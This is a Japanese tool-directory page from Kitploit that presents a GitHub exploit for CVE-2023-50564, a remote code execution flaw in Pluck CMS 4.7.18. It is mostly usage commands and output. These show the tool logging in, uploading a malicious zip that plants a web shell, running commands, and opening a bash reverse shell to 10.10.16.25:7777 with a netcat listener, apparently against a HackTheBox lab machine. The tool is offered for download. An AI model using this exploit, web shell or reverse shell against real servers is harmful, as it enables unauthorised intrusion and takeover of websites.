Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-50564 — Pluck-CMS v4.7.18 RCEエクスプロイト | Kitploit
ツール/GitHubGitHub/xpltive/cve-2023-50564
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubxpltive/cve-2023-50564

CVE-2023-50564

Pluck-CMS v4.7.18 RCEエクスプロイト

リポジトリを見る
11571年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-50564

CVE-2023-50564 は、Pluck CMS v4.7.18 における RCE 脆弱性です。/inc/modules_install.php コンポーネントの任意ファイルアップロードの脆弱性により、悪意のある .zip ファイルをアップロードして任意のコードを実行できます。

使用方法

エクスプロイトを実行する前に、/login.php で認証するためのパスワードを知っておく必要があります。

ターゲットに対してエクスプロイトを実行します:

root@kitploit:~
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1          
[+] Creating payload malicious.zip                                    
[+] Logging in                                                                                                                              
[+] Login successful                                                                                                                        
[+] Uploading malicious.zip                                        
[+] Upload successful                                                                                                                                                                                                                                                                    
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>

悪意のある .php ファイルには、スクリプトが提供するリンクからアクセスしてコマンドを実行できます。

オプションとして、実行するコマンドは --cmd フラグで指定できます。

root@kitploit:~
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1 --cmd id
[+] Creating payload malicious.zip                                                                                                          
[+] Logging in                                                                                                                              
[+] Login successful                                                                                                                        
[+] Uploading malicious.zip                                                                                                                 
[+] Upload successful                             
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>                                             
[+] Executing command 'id'                                                                                                                  
                                                                      
uid=33(www-data) gid=33(www-data) groups=33(www-data)

リバースシェル

リスナーを起動し、--cmd フラグを使用してリスナーへのリバースシェル接続を確立するコマンドを指定します:

root@kitploit:~
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1 --cmd "bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1'"                                                                                                                                                    
[+] Creating payload malicious.zip                                                                                                          
[+] Logging in                                                                                                                              
[+] Login successful                     
[+] Uploading malicious.zip                                                                                                                 
[+] Upload successful                                                                                                                       
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>                                             
[+] Executing command 'bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1''

そして、リスナーで接続を取得します:

root@kitploit:~
$ rlwrap -cAr nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.16.25] from (UNKNOWN) [10.129.78.209] 38982
bash: cannot set terminal process group (1003): Inappropriate ioctl for device
bash: no job control in this shell
www-data@greenhorn:~/html/pluck/data/modules/malicious$

インストール

依存関係をインストールします:

root@kitploit:~
pip install -r requirements.txt

ヘルプ:

root@kitploit:~
$ python3 exploit.py --help                                                                               
usage: exploit.py [-h] --target TARGET --password PASSWORD [--cmd CMD]

Exploit Pluck v4.7.18 RCE Vulnerability

options:
  -h, --help           show this help message and exit
  --target TARGET      Target URL (Example: http://greenhorn.htb)
  --password PASSWORD  Pluck password
  --cmd CMD            Command to execute

クレジット

脆弱性を発見した Mirabbas Ağalarov にクレジットを捧げます (リンク)。

ツールをダウンロード